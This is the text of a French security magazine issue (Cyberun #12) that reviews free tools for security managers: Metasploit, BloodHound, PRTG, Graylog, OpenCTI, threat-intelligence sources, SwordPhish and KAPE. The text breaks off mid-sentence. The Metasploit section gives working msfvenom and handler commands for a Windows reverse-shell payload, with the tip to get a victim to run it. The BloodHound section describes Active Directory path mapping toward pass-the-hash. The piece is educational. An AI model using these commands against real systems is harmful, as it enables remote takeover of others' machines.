SlideShare une entreprise Scribd logo

Cyberun #12

B
bertrandmeens

Edition #12 (juillet 2020) du magazine Cyberun : 12 outils (gratuits) à essayer pour les RSSI... et les autres !

Technologie
1  sur  7
Télécharger pour lire hors ligne
La trousse à outils Attaquer pour mieux défendre _02 Superviser _04 Se renseigner _06 Se préparer au pire _08 Améliorer les applications _10 Les grognements de Cy-Bear _12 10 autres outils proposés par nos experts _12 S O M M A I R E 12 outils (gratuits) à essayer pour les RSSI... et les autres ! Les situations de crise nécessitent de larges compétences transverses, mais également des connaissances techniques approfondies. Pour pouvoir décider rapidement et efficacement, le RSSI et, plus généralement, les top-managers en sécurité vont puiser dans l’ensemble de leur culture cyber, mais vont également devoir (re-)mettre “les mains dans le cambouis”. Cet aspect technique est parfois délaissé, voire décrié, en raison d’autres impératifs. Pourtant, c’est un point clé pour mieux envisager les solutions, en connaître les limites et construire une stratégie, tout en améliorant la communication avec les équipes opérationnelles. Culturellement, la cybersécurité repose sur une dichotomie entre le secret et le partage. L’open source est l’une des clés de traçabilité des solutions. Les développements communautaires fleurissent, tout comme les groupes plus “dark”. Résultat, des centaines d’outils gratuits sont à notre disposition pour mieux connaître le fonctionnement des attaques, pour les détecter, pour les gérer, ou encore les éviter. Loin de se vouloir exhaustifs, nos experts vous en proposent une douzaine. Il s’agit d’en découvrir le fonction- nement de façon pratique, de vous guider dans leur utilisation : se former (voir combien il est simple de mener une attaque...), renforcer sa résilience (sensibiliser sur le spam et préparer des contre-mesures), gagner en maturité en attendant de pouvoir passer à des solutions plus avancées (par exemple dans le cas de la gestion des logs ou pour sécuriser les annuaires Active Directory), ou encore simplifier ses processus organisationnels. A vous de piocher dans cette trousse à outils en fonction des besoins de votre organisation. 5 idées à retenir… “Outils gratuits” équivaut à “pas de frais de licence”. Le coût humain/temporel n’est toutefois pas à négliger. Prendre le temps d’essayer par soi-même des solutions peut provoquer une amélioration sensible de sa maturité technique, préjudiciable aux discours marketing trop édulcorés. Les solutions open source ou gratuites permettent de débroussailler des problématiques, créer des PoC et faire avancer l’entreprise. De plus en plus d’outils gratuits disposent également de versions “commerciales”, proposant une assistance technique, une interface plus avancée... Pour choisir entre plusieurs solutions gratuites “concurrentes”, regardez la fréquence des mises à jour, la taille des communautés de développeurs et la qualité des forums de discussion. J U I L 2 0 2 0 12 C Y B E R S E C U R I T Y S T R AT E G I E S c y b e r u n . n e t Toolbox
_Cyberun#12 Plus besoin d’être un génie pour utiliser des outils d’attaque, fortement démocratisés. Le temps nécessaire est souvent réduit à quelques minutes, voire quelques secondes. ATTAQUER POUR MIEUX DÉFENDRE _02 / _03 _01 : Lancer une attaque L’activité d’audit de sécurité, qui vise à tester votre degré de vulnérabilité à certaines failles de sécurité des systèmes d’information, fait largement appel à des produits open source, tels que Nessus – qui, à l’origine, était gratuit – et Metasploit, qui dispose d’une version open source. Nessus est un scanneur de vulnérabilités, alors que Metasploit, dans sa version gratuite, est plutôt un framework de vulnérabilités et d’exploits. Entièrement développé en langage Ruby, il intègre des modules propres à certains exploits que l’on peut développer en Ruby, Perl, PHP, C++ ou C. Le produit s’enrichit grâce à une large communauté de développeurs qui s’occupe d’inclure nombre de failles (CVE) très rapidement. Avec son large panel de modules, Metasploit permet la collecte d’informations/de traces réseaux, la prise de contrôle machine (bind shell/reverse shell), l’escalade de privilèges, mais aussi des keyloggers ou d’outils permettant la capture d’écran de la machine victime. Plus de 2 000 modules (“exploits”) sont disponibles, permettant quasiment à tout un chacun de lancer une attaque. Si Nessus se concentre plutôt sur des vulnérabilités réseaux, Metasploit va permettre de mettre à mal des logiciels de protection comme les antivirus ou les firewalls personnels. Il est intégré aux distributions Linux Kali ou ParrotOS ou peut être téléchargé depuis www.metasploit.com (une version Windows existe également). Commençons par créer une “charge”, ou payload. Depuis le dossier metas- ploit-framework/bin, lancez la commande msfvenom -p windows/meterpreter/ reverse_tcp lhost=192.168.0.100 lport=8080 -f exe > monmalware.exe en chan- geant (systématiquement) 192.168.0.100 par l’adresse IP de votre machine. Trouvez un moyen pour que le programme monmalware.exe soit téléchargé, puis exécuté sur la machine de votre victime. En parallèle, saisissez : msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse _ tcp set lhost 192.168.0.100 set lport 8080 exploit Lorsque monmalware.exe sera lancé (si le port 8080 est bien accessible), un shell sera disponible (indiqué par meterpreter >). Tapez par exemple “dir c:” pour obtenir la liste des fichiers du poste de la victime. Boîte à outils exceptionnelle, Metasploit se targue d’être l’outil le plus utilisé en test d’intrusions. Metasploit est gratuit en version ligne de com- mande. Depuis son acquisition par la société Rapid 7 en 2009, il existe une version pro payante qui dispose d’une interface graphique et qui inclut la grande majorité des modules. Depuis sa version 2017, Metasploit a intégré des outils de fuzzing, qui permettent d’injecter des données aléatoires. Vous pouvez donc tester vos applica- tions, voir leurs réactions et détecter une faille sur l’application en tant que telle. PaloAltoNetworksutiliseMetasploit,parexemple, dans le cas de proof of concept quand le client souhaite tester certaines attaques précises. Il est également utilisé dans nos environnements de démo afin de montrer comment notre plateforme peut prévenir les attaques. Nous l’utilisons également dans les environnements dédiés à l’éducation (ainsi, Metasploit est intégré à notre environnement cloud dédié). BloodHound (en référence à la race de chien limier) est un projet open source (gratuit/GNU General Public License) et il est principalement maintenu par Andrew Robbins de la société SpecterOps, qui développe des outils professionnels pour les Red Teams. Mais l’origine de Blood- Hound est bel et bien française ! En 2014, deux membres de l’ANSSI, Lucas Bouillot et Emmanuel Gras, rédigent Chemins de contrôle en environnement Active Directory, qui sera le fondement de l’outil BloodHound, à savoir la théorie des graphs appliquée à la sécurité Active Directory. Régulièrement utilisé lors des attaques sur Active Directory, le code de BloodHound est également intégré à certains malwares, permettant l’analyse des mauvaises configurations Active Directoryetledéploiementàl’échelledela charge de chiffrement. Depuis, Emmanuel Gras a cofondé la société Alsid avec Luc Delsalle : Alsid for AD est une solution s’adressant aux professionnels de la sécu- rité permettant de mettre en évidence les mauvaises configurations liées à Active Directory et vous explique comment les corriger. Alsid for AD vous permettra également d’être alerté en temps réel si un nouveau chemin apparaît en capturant l’ensemble des modifications réalisées dans Active Directory. FRÉDÉRIC NAKHLÉ | Senior Manager System Engineering EMEA, Palo Alto Networks METASPLOIT BLOODHOUND SYLVAIN CORTES | Security Evangelist, Alsid BloodHound permet d’explorer et de comprendre les chemins de compromission au sein de l’annuaire Active Directory (AD) afin d’en détecter les faiblesses. Outil classique des Red Teams, il présente sous une forme graphique explicite les différents chemins exploi- tables (liés à des mauvaises configurations de l’AD) afin de devenir administrateur de domaine sur l’environnement cible. Il n’est toutefois pas un outil d’attaque directe, au sens où il ne permet pas, par exemple, d’exécuter des reverse shells, de capturer des mots de passe ou d’injecter des DLL. La cartographie de l’infrastructure est tout à fait primordiale pour un attaquant, car elle lui permettra de cibler les ressources ou objets à compromettre pour rapidement arriver à ses fins. Dans un Active Directory de plusieurs milliers d’objets, il est nécessaire pour l’atta- quant ou le malware d’accélérer son processus de compromission en visant les objets principaux qui possèdent des “faiblesses”. Ces faiblesses peuvent être d’ordre structurel ou comportemental, mais l’idée est de toucher directement au but en ayant, au préalable, par- faitement cartographié l’environnement pour gagner en efficacité. Pour installer BloodHound et ses dépendances sur un système, par exemple sur une machine sous Windows 10, vous devez être admi- nistrateur local de la machine. Néanmoins, vous n’aurez pas besoin d’être administrateur du domaine Active Directory pour utiliser l’outil, ce qui est d’ailleurs logique, puisque l’objectif de BloodHound est justement de définir les chemins d’attaque pour le devenir ! Il suffira d’utiliser un compte utilisateur de domaine sans pouvoirs particuliers, permettant la lecture des objets Active Directory via le protocole LDAP, ce qui est un droit par défaut de tous les utilisateurs créés dans Active Directory. Pour réaliser votre installation, assurez-vous que les packages Java pour votre environnement ainsi que le .NET Framework 3.5 sont installés. La version communautaire (gratuite) du serveur Neo4j est également requise. Utilisé dans de nombreux projets commu- nautaires et applications professionnelles et disposant d’une large communauté d’utilisateurs, Neo4j est un système de gestion de bases de données basé sur les graphs. Rendez-vous ensuite sur GitHub (https://github.com/BloodHoun- dAD/BloodHound) et téléchargez à la fois la version compilée (Blood-Hound-win32-x64.zip) et la version non compilée. Neo4j est un système de gestion de bases de données basé sur les graphs, développé en Java par la société Neo Technology. Une version communautaire est disponible en open source. La première étape consiste à collecter les données à l’aide de SharpHound (situé dans le répertoire Ingestors). Depuis une fenêtre de commande, rendez-vous dans le répertoire Ingestors et lancez SharpHound.exe --CollectionMethod All. Un fichier ZIP sera généré dans le même répertoire. Pour l’injecter, ouvrez l’interface principale en vous rendant dans le dossier BloodHound-win32-x64, puis en lançant BloodHound.exe. Une fois l’authentification à Neo4j effectuée, importez le fichier ZIP en cliquant sur le bouton Upload Data. Le premier graph apparaît. Il faut distinguer les nodes, les edges et les paths. Les nodes sont globalement des objets – un utilisateur, une machine, un groupe, un domaine. Les edges sont les relations entre les objets – l’appartenance à un groupe, le fait d’être administrateur d’un objet. Le path est un ensemble de nodes connectés par des edges et définit un chemin d’attaque. Le bouton Queries présente des requêtes prêtes à l’usage et permet de lancer les premières recherches simples. L’une des meilleures requêtes préformatées pour commencer l’exploration des chemins de compromission est la requête Shortest Paths to High Value Targets.Legraphvousprésenteraainsilesrelationsentrelesdifférents objets du domaine, avec notamment les comptes à pouvoir et leurs groupes, sur quelles machines les comptes à pouvoir ont déjà ouvert des sessions, quel groupe est capable d’administrer quel objet, les liens d’application des stratégies de groupe (GPO). Si vous trouvez un administrateur local connecté sur une machine, un outil tel que Mimikatz pourra jouer une attaque de type “pass-the-hash” afin de devenir administrateur du domaine. _02 : Cartographier les chemins de compromission Active Directory Exemple de graph résultant de la requête Shortest Paths to High Value Targets L A T R O U S S E À O U T I L S
_Cyberun#12 Contrôler le bon fonctionnement des systèmes, suivre les processus projets et leur avancée, consolider les logs : autant de clés pour obtenir une vision à 360° de ses systèmes d’information. SUPERVISER _Cyberun#12 Toutes les entreprises disposent d’outils de sécurité IT, mais que se passe-t-il s’ils ne sont pas opérationnels ? C’est là que la supervision assure sa fonction de méta-sécurité à 360 °. Dans le cas d’un antivirus, par exemple, PRTG permet de contrôler que l’ensemble du parc de machines est couvert, le niveau de mise à jour pour chacune d’entre elles, et d’établir des statistiques globales de détections de virus. De plus, avec ses fonctions natives et inédites de détection de comportements inhabituels, PRTG permet d’anticiper d’éventuelles intrusions sur le réseau de l’entreprise. Des capteurs personnalisés qui adaptent de nombreux scripts libres de droits sont aussi disponibles. L’une des grandes forces de PRTG est d’être très simple à prendre en main, de ne nécessiter aucune compétence spécifique. La version gratuite de PRTG permet de réaliser de nombreux POC en toute liberté avant de passer, si besoin, à une version payante pour augmenter le nombre de capteurs. https://www.fr.paessler.com/ download/prtg-download Dans une précédente vie entrepreneuriale, j’ai utilisé Graylog comme log manager avec l’idée de développer une couche SIEM afin de créer une plateforme de protection des applications. Cette plateforme était constituée de firewalls, IPS, WAF... qui analysaient le trafic pour détecter les comportements anormaux, et donc de potentielles attaques. Ces divers éléments généraient donc des quantités de logs qu’il fallait analyser. Un syslog aurait été un simple réceptacle et un SIEM un investissement trop important pour une jeune entreprise. Graylog a montré ses capacités à centraliser les logs quel que soit le format. L’interface d’analyse d’événements facilite le croisement des informations entre les sources de données. En outre, la plateforme disposait d’une adresse IP publique inutilisée sur laquelle tout le trafic était bloqué, mais néanmoins enregistré. Ce trafic représente principalement celui des bots, malveillants ou non. “Le bruit de fond de l’Internet” montrait l’origine des IP qui ont “frappé à la porte”, le malware Mirai (port 7547) ou de bots en recherche d’accès telnet (port 23) ou SSH (port 22) pour de futures tentatives d’intrusion. FABIEN PEREIRA VAZ | Technical Sales Manager, Paessler France _03 : Supervision des services et des réseaux PRTG NETWORK MONITOR _04: Outiller l’intégration de la sécurité dans le cycle de vie des projets BENJAMIN LEROUX | Marketing & Innovation, Advens BERTRAND MÉENS | CTO & Membre du CESIN GRAYLOG RETOUR D’EXPÉRIENCE : GESTION PROJET | AUCHAN Les processus comme l’intégration de la sécurité dans le cycle de vie des projets (ISP) sont vite confrontésàdesdifficultésliéesauvolumedeprojets, comment capitaliser sans ralentir le proces- sus projet. A minima, il va falloir à chaque fois réaliser une analyse de risques, produire un plan de traitement adapté et suivre sa bonne implémentation afin de respecter la politique interne, se mettre en conformité (GDPR, RGS, LPM, etc.), voire répondre aux attentes d’un client stratégique. Il y a quelques années, il fallait rédiger un dossier de sécurité, document “à trous” que le chef de projet devait remplir, avec souvent son courage comme seul soutien. En évo- luant vers un outillage de type Excel ou équivalent, la démarche s’est simplifiée. Ce type de classeur se compose générale- ment de trois éléments. Le questionnaire de qualification initiale évalue le niveau de sécurité à atteindre, via une série de questions simples sur le volet fonctionnel (besoins DICP, nature des données, utilisateurs ciblés, etc.) comme technique (hébergement interne ou externe, technologies nouvelles, etc.). La liste de mesures de sécurité préconisées, issues d’un catalogue de mesures types, regroupe les mesures nécessaires à la qualification. Enfin, le tableau de suivi de l’application des mesures de sécurité va permettre au projet d’acter leur mise en place ou d’échanger avec le RSSI en cas de besoin (blocage, difficulté, etc.) et de prouver l’atteinte du niveau de sécurité souhaité. Bien que ce type d’outil facilite l’ISP, il subsiste des difficultés : comment suivre l’ensemble des projets sans perdre des fichiers Excel ? Comment utiliser l’outil à plusieurs, ou conserver l’historique des changements ? Ces questions ont mené Auchan, avec l’expertise d’Advens, à imaginer unportailwebcollaboratif.Le“DigitalSecurity Workplace” intègre le module KB, une version web de la politique de sécurité des SI (PSSI), sous forme d’une base de données requêtable et une version web de l’ISP, appelée SWITS (Security Within IT Services). ChaqueévolutiondelaKB(PSSI)esttransmise automatiquement aux projets concernés. Les justifications des chefs de projet sont tracées, tout comme les revues des RSSI. _5: Une gestion modernisée des logs Le SIEM est la pierre angulaire de l’outillage du Security Operation Center (SOC), mais beaucoup d’entreprises n’ont ni la maturité, ni le budget. Entre “rester aveugle sur l’activité de son SI” et mettre en œuvre un projet de SOC, un palier intermédiaire permet de faire mûrir son organisation en améliorant la gestion de ses logs. Les solutions open source ont largement fait leurs preuves en cyber (Nessus, Snort, pfSense, etc.) ; la gestion des logs n’est pas une exception avec syslog-ng ou Prelude, et plus récemment avec l’arrivée de la stack ELK (Elasticsearch/Logstash/Kibana) qui nécessite toutefois des compé- tences pour bien l’exploiter. Graylog est une solution packagée de gestion des logs avec une version open source déjà intéressante et une version enterprise qui lorgne vers le SIEM. Graylog intègre Elasticsearch pour gagner en performance lors de requêtes,dispose d’une IHM moderne et d’une API REST (interopérabilité avec d’autres applications). Il propose la collecte facilitée des logs, l’analyse visuelle des logs, des tableaux de bord personnalisables, des alertes avec notification par email ou messagerie instantanée (Slack, Teams, etc.), et des droits multi-utilisateurs. Graylog propose une marketplace de modules complémentaires, tels que de nombreuses librairies (gratuites) pour l’intégration spécifique de logs. _04 / _05 “Le portail DSW rend la connaissance sécurité facilement accessible à tous. Il est au cœur des processus de sécurité d’Auchan Retail. Il apporte visibilité, communication, industrialisation des processus…” explique Frédérick Meyer, CISO d’Auchan Retail. “Le SWITS facilite le processus d’ISP, l’uniformise entre les pays. Grâce à la notion de dépendance, il est vecteur d’économies et de valeur ajoutée, à tel point que d’autres enseignes et d’autres métiers s’y intéressent : DPO, contrôle interne, audit interne, etc.” PRTG Network Monitor est une solution de supervision qui permet d’obtenir une visibilité complète sur la disponibilité et les performances de l’ensemble des infrastructures, systèmes et réseaux de l’entreprise. Elle est donc utile pour les entreprises de tout secteur en tant que complément aux outils traditionnels de cybersécurité, afin de s’assurer que ceux-ci remplissent bien leur rôle de protection. PRTG permet également d’anticiper des menaces potentielles grâce à la détection de comporte- ments inhabituels sur le réseau ou encore d’événements corrélés, en se basant sur l’historique d’utilisation. La supervision est aussi un outil clé pour lutter contre le Shadow IT, puisqu’elle permet de détecter les équipements connectés au réseau sans autorisation, à l’aide d’un scan récurrent. Une fois PRTG installé sur un PC sous Windows et connecté au réseau (version Linux en Beta et version cloud PC/Mac hébergée par Paessler également disponibles), le logiciel propose d’effectuer un scan automatique de tous les équipements et machines du réseau de l’entreprise pour y déployer des capteurs. Ce sont eux qui vont permettre d’obtenir des métriques sur chaque système, routeur, switch ou application de l’entreprise, afin de les superviser. PRTG propose plus de 260 types de capteurs prédéfinis (bande passante, sites web, SNMP, serveurs virtuels, bases de données, etc.) et la possibilité de créer ses propres capteurs et scripts. La version d’évaluation de PRTG permet de déployer un nombre illimité de capteurs durant 30 jours, puis devient automatiquement une version gratuite limitée à 100 capteurs actifs, mais sans aucune limite de temps. Les indica- teurs supervisés par les capteurs sont rassemblés dans un ou plusieurs tableaux de bord person- nalisables, rapides et simples à consulter depuis l’application Desktop, une interface web ou un appareil mobile iOS/Android. Des alertes sur des dépassements de seuil peuvent être configurées afin de recevoir des notifications par email ou SMS, mais aussi d’exécuter un programme si nécessaire. Tous les protocoles et technologies incontournables (SNMP, WMI, SSH, API REST, etc.) ainsi que les applications et équipements d’éditeurs (Cisco, Dell, HP, IBM, NetApp, Linux, AWS, etc.) sont pris en charge par PRTG. En termes de sécurité, PRTG peut superviser les solutions Anti-DDOS, IPS/IDS, les firewalls et antivirus, les reverse proxies, les mises à jour système ou des équipements physiques comme des caméras de sécurité. L A T R O U S S E À O U T I L S
Construire une base de connaissances sur les menaces visant l’entreprise permet d’améliorer fortement sa stratégie cyber, sans pour autant nécessiter des moyens financiers très importants. SE RENSEIGNER _Cyberun#12 _06 / _07 OpenCTI est une plateforme ouverte d’analyse de la cybermenace. L’outil, intégralement open source, est aujourd’hui disponible à l’usage de l’ensemble des acteurs de la “Threat Intelligence”. L’application leur permet ainsi de stocker, d’organiser, de visualiser et partager leurs propres connaissances en la matière. L’outil est architecturé autour des trois niveaux de connaissances. Connaissances techniques ou tactiques : cette catégorie regroupe par exemple les indicateurs de compromission, les exemples d’emails de phishing, les artefacts, les listes d’adresses IP ou d’autres éléments obser- vables. Ce sont les éléments techniques qui caractérisent une attaque. Connaissances opérationnelles : moins techniques, il s’agit là de décrire les tactiques des attaquants ou TTP (Techniques, Tactiques et Procédures) utilisées pour entrer et assurer la latéralisation de l’attaque. On y retrouve les types de malwares et les tactiques utilisés. Connaissances stratégiques : on parle ici des grands enjeux comme la typologie des victimes (secteur industriel particulier, taille d’organisation, etc.), de l’attribution (qui a lancé l’attaque), de la motivation du groupe cybercriminel (lucrative, destruction, espionnage, etc.). L’une des grandes forces d’OpenCTI est de permettre de visualiser cette connaissance sur les trois niveaux en même temps, ce qui donne accès à une lecture croisée par secteur/type de cybercriminels/indicateurs de compromission, par exemple. Le projet OpenCTI dépasse les 400 000 téléchargements, possède plus de 20 connecteurs vers diverses sources de CTI et compte une vingtaine de contributeurs actifs. Plus de 500 organisations dans le monde l’utilisent, dont l’ANSSI, le CERT-EU, ClearSky Sec, ou encore Thales. Cette plateforme est utilisable par toute entreprise ou agence publique, quelle que soit sa taille, qui souhaite s’équiper d’un outil puissant et gratuit de gestion de la connais- sance en matière d’analyse de la cybermenace. La plateforme peut s’installer en version on-premise ou dans le cloud, au choix. Vide au départ, OpenCTI possède de nombreux connecteurs qui permettent d’intégrer les grandes sources de Threat Intelligence privées comme open source. Attaché à OpenCTI et contributeur depuis le début, je crois que la démocratisation de l’usage de la CTI est critique pour la prévention et la maîtrise des risques. Développé par l’ANSSI avec le CERT-EU, le projet est unique par les cas d’usage qu’il couvre et la façon dont il a été conçu (décentralisé, scalable). Open source depuis juin 2019, il a reçu le soutien de contributeurs comme Thales, DCSO et IBM, en plus de la commu- nauté open source. Récemment, Thales recherchait une solution pour partager les flux de Threat Intelligence liés à la Covid-19. Cette connaissance devait être disponible pour les ingénieurs, SOC et RSSI du secteur de la santé, chacun ayant besoin d’un niveau d’analyse différent. Déployée en une semaine, OpenCTI a permis d’agréger l’en- semble des flux et sources de CTI à la disposition de Thales, puis de les partager avec les parties prenantes. En plus de 300 000 indicateurs de compromissions mis à disposition, la modélisation a permis de visualiser rapidement les dernières campagnes et les tactiques utilisées. SAMUEL HASSINE | Directeur EDR et sécurité Europe du Sud, Tanium _06 : Plateforme de Threat Intelligence OPENCTI _07: Des sources de renseignements ouvertes, adaptées au marché français Quand on bâtit une bibliothèque de connaissances de Threat Intelligence, il faut couvrir tous les aspects du renseignement (opérationnel, tactique et stratégique). En plus de sources commerciales, notre équipe France recommande les sources gratuites suivantes. YANN LE BORGNE | Directeur technique Europe, ThreatQuotient BENOIT GRUNEMWALD Expert en cybersécurité, ESET France Covid-19 : le sujet parfait pour une campagne de cyberattaque par courriel Les cybercriminels se sont jetés sur le sujet Covid-19, allant jusqu’à déposer 5 000 noms de domaines quotidiennement pour dynamiser leurs campagnes de rançongiciels. Pour y faire face, de nombreuses organisations ont décidé d’offrir des sources de renseignement spécifiques, ouvertes et gratuites pour la plupart (cf. https://github.com/MishcondeReya/Covid-19-CTI). Malgré cet élan de solidarité, de nombreuses organisations se sont vues très vite submergées par la difficulté à “ingérer” ces données. ThreatQuotient met alors à disposition les connecteurs et les dashboards nécessaires pour accélérer la mise en consommation des contre-mesures et identifier les incidents associés à ces campagnes de rançongiciels. MITRE ATT&CK SOURCES OSINT Adversary reader – APT Groups and Operations (https://apt.threattracking.com) Ce document va vous aider à remplir le premier niveau de la bibliothèque avec un référentiel public et une grande quantité de documentations téléchargeables pour un stockage local dans la bibliothèque. MITRE ATT&CK (https://attack.mitre.org/) Le MITRE met à disposition son framework ATT&CK, mais également une base de connaissances sur un certain nombre d’adver- saires. Un jeu de données incontournable. MALPEDIA (https://malpedia.caad.fkie.fraunhofer.de/) Service gratuit focalisé sur l’identification et la fourniture de contexte autour des familles de malwares, MALPEDIA fournit des informa- tions de différents niveaux : adversaires, malwares, samples, règles YARA et contexte. Il fait le lien entre le “haut niveau” (les adver- saires) et les capacités d’action (règles YARA) en s’articulant autour des familles de malwares. NVD (https://nvd.nist.gov/) Publiée par le NIST (National Institute of Standards and Technology), elle offre la possibilité à la bibliothèque de couvrir les cas d’usage associés à la gestion des vulnérabilités au sens large. ExploitDB (https://www.exploit-db.com/) Couplée à la source précédente, il s’agit ici d’obtenir à la fois des informations supplé- mentaires sur des vulnérabilités, mais aussi des informations sur l’exploitabilité de celles-ci et, ainsi, de faire un lien vers des outils et malwares collectés auprès des sources précédentes. AlienVault Pulse (https://otx.alienvault.com/) Il s’agit là des premiers indicateurs techniques actionnables dans les défenses de l’organisa- tion. OTX Pulse permet, sur un mode collabo- ratif, de partager des informations. Les “pulses” apportent à la fois les indicateurs techniques et le lien avec les familles de malwares, les adversaires... Le choix des événements Pulse à intégrer localement dans sa bibliothèque se fait en “suivant” des utilisateurs ou des pulses en particulier. Il faut toutefois apporter un soin particulier au choix de ce que l’on souhaite importer automatiquement, car en multipliant les sélections, on peut rapidement se retrouver débordé par la masse d’informations disponibles. MISP CIRCL (https://www.circl.lu/services/misp- malware-information-sharing-platform/) MISP apporte aussi son cercle de confiance de partage, celui du CIRCL : un très bon mix entre les informations actionnables (indicateurs techniques) et les données de haut niveau fournies dans MISP sous le concept de “galaxies”. Est également disponible la notion de framework, notamment celui du MITRE présenté sous forme de Galaxy. Phishtank (https://www.phishtank. com/) et Bambenek (https://osint.bambe- nekconsulting.com/feeds/) Couramment utilisées par nos clients, elles fournissent des indicateurs actionnables dans les défenses. Elle font également le lien avec les couches supérieures du modèle grâce au contexte véhiculé (famille de malwares, notamment). _08: L’indispensable taxinomie des cyberattaques Intrusion, persistance, mouvement latéral, exploitation : comment décrire un code malveillant  ? Quel est le rôle de telle ou telle vulnérabilité  ? Quelles sont les techniques préférées de tel groupe de pirates  ? C’est là que le modèle MITRE ATT&CK entre en jeu  ! Ce référen- tiel permet de créer des taxinomies structurées, qui décrivent aussi bien les attaques (de l’intrusion à l’exfiltration) que les acteurs malveillants ou les malwares. Pour le RSSI, c’est un formidable moyen de relier la posture cybersécurité de son organisation aux solutions techniques qui y sont déployées. En positionnant les solutions de sécurité installées dans ATT&CK, il visualise immédiatement les techniques ou les étapes d’une compromission contre lesquelles elles se positionnent, et donc les “trous dans la raquette”. En plaçant les “scénarii redoutés” d’une analyse de risque (cf. méthode EBIOS) sur la même matrice, il apparaît les risques avérés, qu’aucune des solutions déployées actuellement ne sait adresser. Il simplifie les échanges en servant de “dorsale” : avec le SOC (mettre en détection des éléments spécifiques en fonction des trous dans la matrice), avec la Threat Intelligence (suivre une menace, et positionner les techniques d’attaques sur la matrice afin de constater quelles mesures manquent)... Chez ESET, MITRE ATT&CK est largement utilisé, aussi bien publiquement qu’en interne. Ainsi, notre blog WeLiveSecurity utilise systématiquement ATT&CK pour formaliser les acteurs ou les menaces traitées. L A T R O U S S E À O U T I L S
_08 / _09_Cyberun#12 Une attaque aura forcément lieu : en amont, toute l’entreprise doit améliorer sa culture cyber, “affûter” ses procédures et outils de restauration, mais aussi de collecte de preuves. SE PRÉPARER AU PIRE _09 : Limiter les tentatives de phishing Dans le cadre de la sensibilisation conti- nue de nos utilisateurs à la cybersécurité, nous avons déployé une solution visant à limiter les chances de succès et d’impact d’une attaque par hameçonnage (phishing). SwordPhish est un outil open source, facile à déployer, ayant pour pré-requis l’utilisation du client messagerie Outlook sur les postes de travail. Il existe d’autres outils aux fonctionnalités similaires, dont une version made in France, proposée par le CERT Société Générale, nommée Notify Security. L’implémentation de notre Système de Management de la Sécurité de l’Information (SMSI) a nécessité la mise en place d’indicateurs pour mesurer l’efficacité de nos actions de sensibilisation à la cybersécurité. Le hameçonnage étant l’un des vecteurs d’attaque les plus fréquents, nous avons choisi de travailler sur ce point. Au-delà des mesures techniques de protection contre les emails malveillants, nous voulions renforcer le facteur humain en responsabilisant les utilisa- teurs dans la lutte contre le hameçonnage. Après plus d’une année d’utilisation, nous avons pu mesurer tous les bénéfices de ce type d’outil. Les utilisateurs se sont pris au jeu et reportent des centaines d’attaques par mois. Nous avons même établi un classement pour valoriser les utilisateurs les plus actifs dans la remontée d’attaques par hameçonnage ! Au-delà, cet outil nous a permis de définir plus précisément les services les plus exposés aux tentatives de hameçonnage. Même si nous savions que les services marketing et support seraient en haut du classement, nous disposons maintenant de chiffres pour mieux évaluer les efforts de protection à fournir. Je ne peux donc que conseiller la mise en place de ce type d’outil, très peu coûteux et rapide à déployer, pour mieux protéger les informations de vos entreprises face aux vecteurs privilégiés d’attaques que sont les hameçonnages. Les modules et les cibles choisis avec cette ligne de commande sont très limités en termes de nombre d’artefacts collectés, ils doivent être ajustés pour correspondre aux logiciels principaux présents dans l’environnement de l’entreprise. Notez que le résultat du script de collecte ne doit jamais être écrit dans la partition C: car cela écrase des espaces non alloués, qui pourraient contenir des artefacts supprimés utiles. Les résultats sont enregistrés dans le dossier “kape_<hostname>_output”. C’est dans ce répertoire que se trouve le fichier zip (protégé par un mot de passe : very_long_secure_password) qui sera analysé par l’équipe CERT. Cette extension Outlook (add-in) permet à chaque utilisateur d’être acteur de la protection de l’entreprise contre les tentatives de hame- çonnage. Pour cela, rien de plus simple ! Une fois le script d’installation déployé (https://github.com/Schillings/SwordPhish), les utilisateurs découvrent une nouvelle icône représentant un espadon dans le bandeaudeleurapplicationOutlook.Lechoixsymboliqued’unpoisson pour le visuel est important, car il participe à l’adoption de l’outil en se différenciant des autres fonctionnalités d’Outlook. Lorsque l’utilisateur détecte un message suspect ou malveillant, un simple appui sur l’icône de SwordPhish suffit pour que le mes- sage soit classé dans les “spams” de la boîte mail et soit immédiate- m e n t t r a n s f é r é à l’équipe sécurité. Dès lors, cette dernière reçoit un email, avec toutes les informations “sources” nécessaires et le message initial en pièce jointe. Plusieurs fiches réflexes ont été défi- nies en réponse à ces alertes : cela peut aller d’un simple message de remerciement à l’utilisateur pour sa participation à la protection des informations de l’entreprise à un message de sensibilisation et d’alerte auprès de tous les utilisateurs de l’entreprise, en illustrant l’attaque par l’un des derniers emails malicieux reçus. En complément, l’équipe sécurité dispose de toutes les informations nécessaires pour améliorer les règles de filtrage anti-spam/anti-phishing et déclarer l’attaque auprès des autorités (par exemple sur la plateforme Pharos). LUDOVIC LECOMTE | CISO, Inova Software & Membre du CESIN SWORDPHISH KAPE (Kroll Artifact Parser and Extractor) Même dans l’urgence, il est indispensable de conserver un maximum d’éléments permettant de retracer l’attaque. Lors d’une réponse à incident – processus durant lequel une réaction est organisée à un problème ou un fait de sécurité –, seule une enquête minutieuse peut permettre d’affirmer, par exemple, qu’une machine ne sera pas à nouveau compromise. Pour cela, il va falloir collecter un certain nombre d’artefacts, c’est-à-dire des éléments qui peuvent être utilisés comme preuves dans le cadre d’une enquête. Citons par exemple la liste des processus actifs, la liste des fichiers stockés sur un disque dur, les journaux d’événementsWindows.Letriageestlaphaseduprocessus de réponse à incident durant laquelle les artefacts sont collectés sur les machines compromises, puis analysés. Créé par l’entreprise Kroll, KAPE est l’un des outils les plus rapides pour réaliser le triage des artefacts. Il propose une vaste collection de plugins (appelés targets/ modules). Il est gratuit pour un usage éducatif ou de recherche, pour toutes les agences gouvernementales (qu’elles opèrent au niveau local, régional, fédéral ou international), mais également pour les entreprises qui en font un usage interne (il ne nécessite une licence commerciale que lorsqu’il est utilisé sur un réseau tiers, dans le cadre d’un engagement facturé). Vous trouverez des informations complémentaires sur https://ericzim- merman.github.io/KapeDocs. À ne pas oublier dans votre trousse à outils ! _10 : Collecter les informations en vue du forensic KAPE (Kroll Artifact Parser and Extractor) est un logiciel de triage sur des ordinateurs Windows, utilisable en ligne de commande, mais disposant aussi d’une interface graphique. Il est téléchargeable depuis le site www.kroll.com. Il requiert les privilèges administrateur pour collecter des artefacts et permet de rassembler la plupart des données nécessaires à une enquête judiciaire. La première phase d’exécution concerne la collecte des cibles (targets), c’est-à-dire les plugins qui déterminent quels sont les fichiers à copier (et les fichiers verrouillés par l’OS). La seconde est le lancement des modules (intégrés à Windows ou provenant de tiers) tels que Netstat, winPmem, qui peuvent utiliser les artefacts définis dans la 